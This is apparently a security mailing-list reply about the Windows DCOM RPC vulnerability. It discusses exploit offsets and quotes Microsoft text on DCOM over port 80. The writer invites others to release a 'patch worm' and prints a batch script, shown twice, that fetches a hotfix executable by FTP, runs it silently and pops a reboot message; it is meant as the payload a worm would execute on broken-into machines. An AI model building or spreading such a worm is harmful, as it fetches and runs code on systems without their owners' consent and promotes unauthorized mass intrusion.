there is no exploit code attached to your message... i too have the universal offsets for win2k and xp wondering if we can match them... also i was informed from an associate by the handle of 'harq' that dcom is also bound to port 80
"Component Object Model (COM) Internet Services (CIS) introduces support for a new Distributed COM (DCOM) transport protocol known as Tunneling Transmission Control Protocol (TCP) that allows DCOM to operate over TCP port 80. This allows a client and a server to communicate in the presence of most proxy servers and firewalls, thereby enabling a new class of COM-based Internet scenarios."
which also opening a new can off worms for routered servers... any takers on releasing a patch worm?? something to the effect of the kaHt webdav worms code
echo open ftp.microsoft.com>a
echo ftp>a
echo a@>>a
echo bin>>a
echo get DCOM_HOTFIX.exe>>a
echo bye>>a
ftp -a:a
DCOM_HOTFIX.exe /install
del a
net send localhost Vunerable SERVER PATCHED. Please Reboot NOW.
exit
echo ftp>a
echo a@>>a
echo bin>>a
echo get DCOM_HOTFIX.exe>>a
echo bye>>a
ftp -a:a
DCOM_HOTFIX.exe /install
del a
net send localhost Vunerable SERVER PATCHED. Please Reboot NOW.
exit
::blackhat snicker:::
illwill
Sami Dhillon <[EMAIL PROTECTED]> wrote:
Hi i found these offsets after so much tiring work anyways here is my first post with my proof of concept code i did tried on my network and all worked so please check and send me the suggestions and improvementsthank youSami Anwer Dhillon
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
